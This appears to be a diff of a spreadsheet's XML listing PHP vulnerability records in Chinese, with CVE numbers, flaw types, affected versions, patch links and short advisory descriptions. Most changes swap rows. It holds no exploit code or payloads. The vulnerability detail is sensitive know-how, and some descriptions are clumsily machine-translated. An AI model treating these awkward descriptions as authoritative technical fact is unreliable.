-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/mbstring/libmbfl/mbfl/mbfilter.c文件中的‘the mbfl_strcut’函数存在整数溢出漏洞。远程攻击者可借助特制的mb_strcut调用利用该漏洞造成拒绝服务（应用程序崩溃）或执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
+          <t>PHP 5.6.25之前的ext/gd/gd.c和7.0.10之前的7.x中的imagegammacorrect函数无法正确验证gamma值，这使远程攻击者可以拒绝服务（越界写入）或通过为第二个和第三个论点提供不同的符号来产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G339" t="inlineStr">
@@ -41592,7 +41592,7 @@
       </c>
       <c r="J339" t="inlineStr">
         <is>
-          <t>CVE-2016-4073</t>
+          <t>CVE-2016-7127</t>
         </is>
       </c>
       <c r="K339" t="inlineStr">
@@ -41667,7 +41667,7 @@
     <row r="340">
       <c r="A340" t="inlineStr">
         <is>
-          <t>PHP拒绝服务漏洞(CVE-2016-7411)</t>
+          <t>PHP 拒绝服务漏洞(CVE-2016-7414)</t>
         </is>
       </c>
       <c r="B340" t="inlineStr">
@@ -41687,12 +41687,13 @@
       </c>
       <c r="E340" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F340" t="inlineStr">
         <is>
-          <t>PHP中的ext/standard/var_unserializer.re文件存在安全漏洞，该漏洞源于程序没有正确处理object-deserialization错误。远程攻击者可利用该漏洞造成拒绝服务（内存损坏）。</t>
+          <t>PHP 5.6.26之前的ZIP签名验证功能和7.0.11之前的7.x不能确保uncompressed_filesize字段足够大，这使远程攻击者可以拒绝服务（越界内存访问）或通过精心制作的PHAR存档（与ext/phar/util.c和ext/phar/zip.c有关）具有其他未指定的影响。</t>
         </is>
       </c>
       <c r="G340" t="inlineStr">
@@ -41712,7 +41713,7 @@
       </c>
       <c r="J340" t="inlineStr">
         <is>
-          <t>CVE-2016-7411</t>
+          <t>CVE-2016-7414</t>
         </is>
       </c>
       <c r="K340" t="inlineStr">
@@ -41787,7 +41788,7 @@
     <row r="341">
       <c r="A341" t="inlineStr">
         <is>
-          <t>PHP 拒绝服务漏洞(CVE-2016-7414)</t>
+          <t>PHP拒绝服务漏洞(CVE-2016-7411)</t>
         </is>
       </c>
       <c r="B341" t="inlineStr">
@@ -41807,13 +41808,12 @@
       </c>
       <c r="E341" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F341" t="inlineStr">
         <is>
-          <t>PHP 5.6.26之前的ZIP签名验证功能和7.0.11之前的7.x不能确保uncompressed_filesize字段足够大，这使远程攻击者可以拒绝服务（越界内存访问）或通过精心制作的PHAR存档（与ext/phar/util.c和ext/phar/zip.c有关）具有其他未指定的影响。</t>
+          <t>PHP中的ext/standard/var_unserializer.re文件存在安全漏洞，该漏洞源于程序没有正确处理object-deserialization错误。远程攻击者可利用该漏洞造成拒绝服务（内存损坏）。</t>
         </is>
       </c>
       <c r="G341" t="inlineStr">
@@ -41833,7 +41833,7 @@
       </c>
       <c r="J341" t="inlineStr">
         <is>
-          <t>CVE-2016-7414</t>
+          <t>CVE-2016-7411</t>
         </is>
       </c>
       <c r="K341" t="inlineStr">
@@ -42148,7 +42148,7 @@
     <row r="344">
       <c r="A344" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2016-4071)</t>
+          <t>PHP gd.c缓冲区溢出漏洞(CVE-2016-7126)</t>
         </is>
       </c>
       <c r="B344" t="inlineStr">
@@ -42163,18 +42163,17 @@
       </c>
       <c r="D344" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E344" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://git.php.net/?p=php-src.git;a=commit;h=6e25966544fb1d2f3d7596e060ce9c9269bbdcf8</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F344" t="inlineStr">
         <is>
-          <t>PHP的ext/snmp/snmp.c文件中的‘php_snmp_error’函数存在格式化字符串漏洞。远程攻击者可借助SNMP：：get调用中的格式化字符串说明符利用该漏洞执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
+          <t>PHP 5.6.25之前的ext/gd/gd.c中的imagetruecolortopalette函数以及7.0.10之前的7.x中的imagetruecolortopalette函数无法正确验证颜色数量，这使远程攻击者可能导致拒绝服务（select_colors分配错误并出边界写入），或者通过第三个参数中的较大值可能具有未指定的其他影响。</t>
         </is>
       </c>
       <c r="G344" t="inlineStr">
@@ -42194,7 +42193,7 @@
       </c>
       <c r="J344" t="inlineStr">
         <is>
-          <t>CVE-2016-4071</t>
+          <t>CVE-2016-7126</t>
         </is>
       </c>
       <c r="K344" t="inlineStr">
@@ -42269,7 +42268,7 @@
     <row r="345">
       <c r="A345" t="inlineStr">
         <is>
-          <t>PHP gd.c缓冲区溢出漏洞(CVE-2016-7126)</t>
+          <t>PHP 安全漏洞(CVE-2016-4071)</t>
         </is>
       </c>
       <c r="B345" t="inlineStr">
@@ -42284,17 +42283,18 @@
       </c>
       <c r="D345" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E345" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://git.php.net/?p=php-src.git;a=commit;h=6e25966544fb1d2f3d7596e060ce9c9269bbdcf8</t>
         </is>
       </c>
       <c r="F345" t="inlineStr">
         <is>
-          <t>PHP 5.6.25之前的ext/gd/gd.c中的imagetruecolortopalette函数以及7.0.10之前的7.x中的imagetruecolortopalette函数无法正确验证颜色数量，这使远程攻击者可能导致拒绝服务（select_colors分配错误并出边界写入），或者通过第三个参数中的较大值可能具有未指定的其他影响。</t>
+          <t>PHP的ext/snmp/snmp.c文件中的‘php_snmp_error’函数存在格式化字符串漏洞。远程攻击者可借助SNMP：：get调用中的格式化字符串说明符利用该漏洞执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
         </is>
       </c>
       <c r="G345" t="inlineStr">
@@ -42314,7 +42314,7 @@
       </c>
       <c r="J345" t="inlineStr">
         <is>
-          <t>CVE-2016-7126</t>
+          <t>CVE-2016-4071</t>
         </is>
       </c>
       <c r="K345" t="inlineStr">
@@ -42389,7 +42389,7 @@
     <row r="346">
       <c r="A346" t="inlineStr">
         <is>
-          <t>PHP SPL扩展整数溢出漏洞(CVE-2016-5770)</t>
+          <t>PHP spl扩展释放后重用漏洞(CVE-2016-5771)</t>
         </is>
       </c>
       <c r="B346" t="inlineStr">
@@ -42404,18 +42404,17 @@
       </c>
       <c r="D346" t="inlineStr">
         <is>
-          <t>Integer Overflow</t>
+          <t>Use After Free (UAF)</t>
         </is>
       </c>
       <c r="E346" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
-http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=1e9b175204e3286d64dfd6c9f09151c31b5e099a</t>
         </is>
       </c>
       <c r="F346" t="inlineStr">
         <is>
-          <t>PHP的SPL扩展中的spl_directory.c中的spl_directory.c中的SplFileObject :: fread函数的整数溢出，允许远程攻击者拒绝服务或可能通过大整数造成未指定的其他影响，这可能导致远程攻击者论点，与CVE-2016-5096相关的问题。</t>
+          <t>PHP的5.5.37之前的SPL扩展中的spl_array.c和5.6.23之前的5.6.x与未序列化的实现和垃圾回收进行不正确的交互，这使远程攻击者可以执行任意代码或导致拒绝服务（使用后-免费和应用程序崩溃）通过精心制作的序列化数据。</t>
         </is>
       </c>
       <c r="G346" t="inlineStr">
@@ -42435,7 +42434,7 @@
       </c>
       <c r="J346" t="inlineStr">
         <is>
-          <t>CVE-2016-5770</t>
+          <t>CVE-2016-5771</t>
         </is>
       </c>
       <c r="K346" t="inlineStr">
@@ -42510,7 +42509,7 @@
     <row r="347">
       <c r="A347" t="inlineStr">
         <is>
-          <t>PHP spl扩展释放后重用漏洞(CVE-2016-5771)</t>
+          <t>PHP SPL扩展整数溢出漏洞(CVE-2016-5770)</t>
         </is>
       </c>
       <c r="B347" t="inlineStr">
@@ -42525,17 +42524,18 @@
       </c>
       <c r="D347" t="inlineStr">
         <is>
-          <t>Use After Free (UAF)</t>
+          <t>Integer Overflow</t>
         </is>
       </c>
       <c r="E347" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=1e9b175204e3286d64dfd6c9f09151c31b5e099a</t>
+          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
+http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F347" t="inlineStr">
         <is>
-          <t>PHP的5.5.37之前的SPL扩展中的spl_array.c和5.6.23之前的5.6.x与未序列化的实现和垃圾回收进行不正确的交互，这使远程攻击者可以执行任意代码或导致拒绝服务（使用后-免费和应用程序崩溃）通过精心制作的序列化数据。</t>
+          <t>PHP的SPL扩展中的spl_directory.c中的spl_directory.c中的SplFileObject :: fread函数的整数溢出，允许远程攻击者拒绝服务或可能通过大整数造成未指定的其他影响，这可能导致远程攻击者论点，与CVE-2016-5096相关的问题。</t>
         </is>
       </c>
       <c r="G347" t="inlineStr">
@@ -42555,7 +42555,7 @@
       </c>
       <c r="J347" t="inlineStr">
         <is>
-          <t>CVE-2016-5771</t>
+          <t>CVE-2016-5770</t>
         </is>
       </c>
       <c r="K347" t="inlineStr">
@@ -43953,7 +43953,7 @@
     <row r="359">
       <c r="A359" t="inlineStr">
         <is>
-          <t>PHP 缓冲区错误漏洞(CVE-2019-9021)</t>
+          <t>PHP 缓冲区错误漏洞(CVE-2019-9023)</t>
         </is>
       </c>
       <c r="B359" t="inlineStr">
@@ -43973,12 +43973,12 @@
       </c>
       <c r="E359" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=77247</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：http://www.php.net/</t>
         </is>
       </c>
       <c r="F359" t="inlineStr">
         <is>
-          <t>在PHP 5.6.40之前，7.1.26之前的7.x，7.2.14之前的7.2.x和7.3.1之前的7.3.x中发现了一个问题。PHAR扩展中PHAR读取功能中基于堆的缓冲区超量读取可能会允许攻击者在尝试解析文件名时读取超出实际数据的已分配或未分配内存，这是与CVE-2018-20783不同的漏洞。这与ext/phar/phar.c中的phar_detect_phar_fname_ext有关。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的mbstring正则表达式函数存在缓冲区溢出漏洞。攻击者可借助无效的多字节数据利用该漏洞造成内存损坏/泄露。以下版本受到影响：PHP 5.6.40之前版本，7.1.26之前的7.x版本，7.2.14之前的7.2.x版本，7.3.1之前的7.3.x版本。</t>
         </is>
       </c>
       <c r="G359" t="inlineStr">
@@ -43998,7 +43998,7 @@
       </c>
       <c r="J359" t="inlineStr">
         <is>
-          <t>CVE-2019-9021</t>
+          <t>CVE-2019-9023</t>
         </is>
       </c>
       <c r="K359" t="inlineStr">
@@ -44073,7 +44073,7 @@
     <row r="360">
       <c r="A360" t="inlineStr">
         <is>
-          <t>PHP 缓冲区错误漏洞(CVE-2019-9023)</t>
+          <t>PHP 缓冲区错误漏洞(CVE-2019-9021)</t>
         </is>
       </c>
       <c r="B360" t="inlineStr">
@@ -44093,12 +44093,12 @@
       </c>
       <c r="E360" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：http://www.php.net/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=77247</t>
         </is>
       </c>
       <c r="F360" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的mbstring正则表达式函数存在缓冲区溢出漏洞。攻击者可借助无效的多字节数据利用该漏洞造成内存损坏/泄露。以下版本受到影响：PHP 5.6.40之前版本，7.1.26之前的7.x版本，7.2.14之前的7.2.x版本，7.3.1之前的7.3.x版本。</t>
+          <t>在PHP 5.6.40之前，7.1.26之前的7.x，7.2.14之前的7.2.x和7.3.1之前的7.3.x中发现了一个问题。PHAR扩展中PHAR读取功能中基于堆的缓冲区超量读取可能会允许攻击者在尝试解析文件名时读取超出实际数据的已分配或未分配内存，这是与CVE-2018-20783不同的漏洞。这与ext/phar/phar.c中的phar_detect_phar_fname_ext有关。</t>
         </is>
       </c>
       <c r="G360" t="inlineStr">
@@ -44118,7 +44118,7 @@
       </c>
       <c r="J360" t="inlineStr">
         <is>
-          <t>CVE-2019-9023</t>
+          <t>CVE-2019-9021</t>
         </is>
       </c>
       <c r="K360" t="inlineStr">
@@ -44674,7 +44674,7 @@
     <row r="365">
       <c r="A365" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8390)</t>
+          <t>PHP 安全漏洞(CVE-2015-8391)</t>
         </is>
       </c>
       <c r="B365" t="inlineStr">
@@ -44700,7 +44700,7 @@
       </c>
       <c r="F365" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理字符类中的‘[：’和‘＼＼’子串。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（未初始化内存读取）。PHP 引用这个底层库。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本的pcre_compile.c文件中的‘pcre_compile’函数存在安全漏洞，该漏洞源于程序没有正确处理特定的‘[：’嵌套。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（CPU消耗）。PHP引用了此底层组件。</t>
         </is>
       </c>
       <c r="G365" t="inlineStr"/>
@@ -44716,7 +44716,7 @@
       </c>
       <c r="J365" t="inlineStr">
         <is>
-          <t>CVE-2015-8390</t>
+          <t>CVE-2015-8391</t>
         </is>
       </c>
       <c r="K365" t="inlineStr">
@@ -44791,7 +44791,7 @@
     <row r="366">
       <c r="A366" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8391)</t>
+          <t>PHP 安全漏洞(CVE-2015-8390)</t>
         </is>
       </c>
       <c r="B366" t="inlineStr">
@@ -44817,7 +44817,7 @@
       </c>
       <c r="F366" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本的pcre_compile.c文件中的‘pcre_compile’函数存在安全漏洞，该漏洞源于程序没有正确处理特定的‘[：’嵌套。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（CPU消耗）。PHP引用了此底层组件。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理字符类中的‘[：’和‘＼＼’子串。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（未初始化内存读取）。PHP 引用这个底层库。</t>
         </is>
       </c>
       <c r="G366" t="inlineStr"/>
@@ -44833,7 +44833,7 @@
       </c>
       <c r="J366" t="inlineStr">
         <is>
-          <t>CVE-2015-8391</t>
+          <t>CVE-2015-8390</t>
         </is>
       </c>
       <c r="K366" t="inlineStr">
@@ -45145,7 +45145,7 @@
     <row r="369">
       <c r="A369" t="inlineStr">
         <is>
-          <t>PHP PHP_zip.c释放后远程代码执行漏洞(CVE-2016-5773)</t>
+          <t>PHP 越界读取漏洞(CVE-2017-9224)</t>
         </is>
       </c>
       <c r="B369" t="inlineStr">
@@ -45160,17 +45160,17 @@
       </c>
       <c r="D369" t="inlineStr">
         <is>
-          <t>Code Execution</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E369" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-5.phphttp://www.php.net/ChangeLog-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.sqlite.org/releaselog/3_8_9.html</t>
         </is>
       </c>
       <c r="F369" t="inlineStr">
         <is>
-          <t>PHP的5.5.37之前的zip扩展中的php_zip.c，5.6.23之前的5.6.x和7.0.8之前的7.x与反序列化实现和垃圾回收的交互不正确，这使远程攻击者可以执行任意代码或导致通过包含ZipArchive对象的精心制作的序列化数据进行的拒绝服务（使用后使用和应用程序崩溃）。</t>
+          <t>在Oniguruma 6.2.0中发现了一个问题，在Ruby中通过2.4.1的Oniguruma-mod和在PHP中通过7.1.5的mbstring中使用。在正则表达式搜索期间，在match_at（）中发生堆栈越界读取。在match_at（）中涉及验证和访问顺序的逻辑错误可能会导致从堆栈缓冲区读取越界。</t>
         </is>
       </c>
       <c r="G369" t="inlineStr">
@@ -45190,7 +45190,7 @@
       </c>
       <c r="J369" t="inlineStr">
         <is>
-          <t>CVE-2016-5773</t>
+          <t>CVE-2017-9224</t>
         </is>
       </c>
       <c r="K369" t="inlineStr">
@@ -45265,7 +45265,7 @@
     <row r="370">
       <c r="A370" t="inlineStr">
         <is>
-          <t>PHP 越界读取漏洞(CVE-2017-9224)</t>
+          <t>PHP PHP_zip.c释放后远程代码执行漏洞(CVE-2016-5773)</t>
         </is>
       </c>
       <c r="B370" t="inlineStr">
@@ -45280,17 +45280,17 @@
       </c>
       <c r="D370" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Code Execution</t>
         </is>
       </c>
       <c r="E370" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.sqlite.org/releaselog/3_8_9.html</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-5.phphttp://www.php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F370" t="inlineStr">
         <is>
-          <t>在Oniguruma 6.2.0中发现了一个问题，在Ruby中通过2.4.1的Oniguruma-mod和在PHP中通过7.1.5的mbstring中使用。在正则表达式搜索期间，在match_at（）中发生堆栈越界读取。在match_at（）中涉及验证和访问顺序的逻辑错误可能会导致从堆栈缓冲区读取越界。</t>
+          <t>PHP的5.5.37之前的zip扩展中的php_zip.c，5.6.23之前的5.6.x和7.0.8之前的7.x与反序列化实现和垃圾回收的交互不正确，这使远程攻击者可以执行任意代码或导致通过包含ZipArchive对象的精心制作的序列化数据进行的拒绝服务（使用后使用和应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G370" t="inlineStr">
@@ -45310,7 +45310,7 @@
       </c>
       <c r="J370" t="inlineStr">
         <is>
-          <t>CVE-2017-9224</t>
+          <t>CVE-2016-5773</t>
         </is>
       </c>
       <c r="K370" t="inlineStr">
@@ -45505,7 +45505,7 @@
     <row r="372">
       <c r="A372" t="inlineStr">
         <is>
-          <t>PHP snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
+          <t>PHP拒绝服务漏洞(CVE-2016-6294)</t>
         </is>
       </c>
       <c r="B372" t="inlineStr">
@@ -45530,7 +45530,7 @@
       </c>
       <c r="F372" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/snmp/snmp.c文件存在安全漏洞，该漏洞源于程序没有正确实现未序列化实施和垃圾数据回收的交互。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务（释放后重用和应用程序崩溃）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
+          <t>PHP中ext / intl / locale / locale_methods.c中ext/intl/locale/locale_methods.c中的locale_accept_from_http函数不能正确限制对ICU uloc_acceptLanguageFromHTTP函数的调用，该函数允许远程访问攻击者通过长参数调用导致拒绝服务（越界读取）或可能产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G372" t="inlineStr">
@@ -45550,7 +45550,7 @@
       </c>
       <c r="J372" t="inlineStr">
         <is>
-          <t>CVE-2016-6295</t>
+          <t>CVE-2016-6294</t>
         </is>
       </c>
       <c r="K372" t="inlineStr">
@@ -45625,7 +45625,7 @@
     <row r="373">
       <c r="A373" t="inlineStr">
         <is>
-          <t>PHP simplestring_addn函数整数签名漏洞(CVE-2016-6296)</t>
+          <t>PHP snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
         </is>
       </c>
       <c r="B373" t="inlineStr">
@@ -45640,7 +45640,7 @@
       </c>
       <c r="D373" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E373" t="inlineStr">
@@ -45650,7 +45650,7 @@
       </c>
       <c r="F373" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。GD是其中的一个图形扩展库组件。xmlrpc-epi是一套采用C语言开发的易于开发者使用的序列化RPC请求的API。PHP中使用的xmlrpc-epi 0.54.2及之前的版本中的simplestring.c文件中的‘simplestring_addn’函数存在整数符号错误漏洞。远程攻击者可通过向PHP xmlrpc_encode_request函数传递较长的参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/snmp/snmp.c文件存在安全漏洞，该漏洞源于程序没有正确实现未序列化实施和垃圾数据回收的交互。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务（释放后重用和应用程序崩溃）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
         </is>
       </c>
       <c r="G373" t="inlineStr">
@@ -45670,7 +45670,7 @@
       </c>
       <c r="J373" t="inlineStr">
         <is>
-          <t>CVE-2016-6296</t>
+          <t>CVE-2016-6295</t>
         </is>
       </c>
       <c r="K373" t="inlineStr">
@@ -45745,7 +45745,7 @@
     <row r="374">
       <c r="A374" t="inlineStr">
         <is>
-          <t>PHP拒绝服务漏洞(CVE-2016-6294)</t>
+          <t>PHP simplestring_addn函数整数签名漏洞(CVE-2016-6296)</t>
         </is>
       </c>
       <c r="B374" t="inlineStr">
@@ -45760,7 +45760,7 @@
       </c>
       <c r="D374" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E374" t="inlineStr">
@@ -45770,7 +45770,7 @@
       </c>
       <c r="F374" t="inlineStr">
         <is>
-          <t>PHP中ext / intl / locale / locale_methods.c中ext/intl/locale/locale_methods.c中的locale_accept_from_http函数不能正确限制对ICU uloc_acceptLanguageFromHTTP函数的调用，该函数允许远程访问攻击者通过长参数调用导致拒绝服务（越界读取）或可能产生未指定的其他影响。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。GD是其中的一个图形扩展库组件。xmlrpc-epi是一套采用C语言开发的易于开发者使用的序列化RPC请求的API。PHP中使用的xmlrpc-epi 0.54.2及之前的版本中的simplestring.c文件中的‘simplestring_addn’函数存在整数符号错误漏洞。远程攻击者可通过向PHP xmlrpc_encode_request函数传递较长的参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
         </is>
       </c>
       <c r="G374" t="inlineStr">
@@ -45790,7 +45790,7 @@
       </c>
       <c r="J374" t="inlineStr">
         <is>
-          <t>CVE-2016-6294</t>
+          <t>CVE-2016-6296</t>
         </is>
       </c>
       <c r="K374" t="inlineStr">
@@ -45865,7 +45865,7 @@
     <row r="375">
       <c r="A375" t="inlineStr">
         <is>
-          <t>PHP exif_process_ifd_in_makernote信息泄露漏洞(CVE-2016-6291)</t>
+          <t>PHP session.c拒绝服务漏洞(CVE-2016-6290)</t>
         </is>
       </c>
       <c r="B375" t="inlineStr">
@@ -45880,17 +45880,17 @@
       </c>
       <c r="D375" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E375" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.phphttp://php.net/ChangeLog-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F375" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c中的exif_process_IFD_in_MAKERNOTE函数在5.5.38之前的版本，5.6.24之前的5.6.x和7.0.9之前的7.x允许远程攻击者拒绝服务（越界数组）访问和内存损坏），从进程内存中获取敏感信息，或者可能通过精心制作的JPEG图像产生未指定的其他影响。</t>
+          <t>PHP中的ext/session/session.c，5.6.24之前的5.6.x和7.0.9之前的7.x无法正确维护特定的哈希数据结构，这使远程攻击者可以拒绝服务（免费使用）或可能通过与会话反序列化相关的向量产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G375" t="inlineStr">
@@ -45910,7 +45910,7 @@
       </c>
       <c r="J375" t="inlineStr">
         <is>
-          <t>CVE-2016-6291</t>
+          <t>CVE-2016-6290</t>
         </is>
       </c>
       <c r="K375" t="inlineStr">
@@ -45985,7 +45985,7 @@
     <row r="376">
       <c r="A376" t="inlineStr">
         <is>
-          <t>PHP session.c拒绝服务漏洞(CVE-2016-6290)</t>
+          <t>PHP exif_process_ifd_in_makernote信息泄露漏洞(CVE-2016-6291)</t>
         </is>
       </c>
       <c r="B376" t="inlineStr">
@@ -46000,17 +46000,17 @@
       </c>
       <c r="D376" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E376" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.phphttp://php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F376" t="inlineStr">
         <is>
-          <t>PHP中的ext/session/session.c，5.6.24之前的5.6.x和7.0.9之前的7.x无法正确维护特定的哈希数据结构，这使远程攻击者可以拒绝服务（免费使用）或可能通过与会话反序列化相关的向量产生未指定的其他影响。</t>
+          <t>PHP的ext/exif/exif.c中的exif_process_IFD_in_MAKERNOTE函数在5.5.38之前的版本，5.6.24之前的5.6.x和7.0.9之前的7.x允许远程攻击者拒绝服务（越界数组）访问和内存损坏），从进程内存中获取敏感信息，或者可能通过精心制作的JPEG图像产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G376" t="inlineStr">
@@ -46030,7 +46030,7 @@
       </c>
       <c r="J376" t="inlineStr">
         <is>
-          <t>CVE-2016-6290</t>
+          <t>CVE-2016-6291</t>
         </is>
       </c>
       <c r="K376" t="inlineStr">
@@ -46105,7 +46105,7 @@
     <row r="377">
       <c r="A377" t="inlineStr">
         <is>
-          <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
+          <t>PHP bcpowmod 函数拒绝服务漏洞(CVE-2016-4537)</t>
         </is>
       </c>
       <c r="B377" t="inlineStr">
@@ -46120,7 +46120,7 @@
       </c>
       <c r="D377" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E377" t="inlineStr">
@@ -46130,7 +46130,7 @@
       </c>
       <c r="F377" t="inlineStr">
         <is>
-          <t>PHP的ext/xml/xml.c中的ext_xml/xml.c中的xml_parse_into_struct函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（缓冲区读取不足和分段）错误）或可能通过第二个参数中的精心制作的XML数据产生未指定的其他影响，从而导致解析器级别为零。</t>
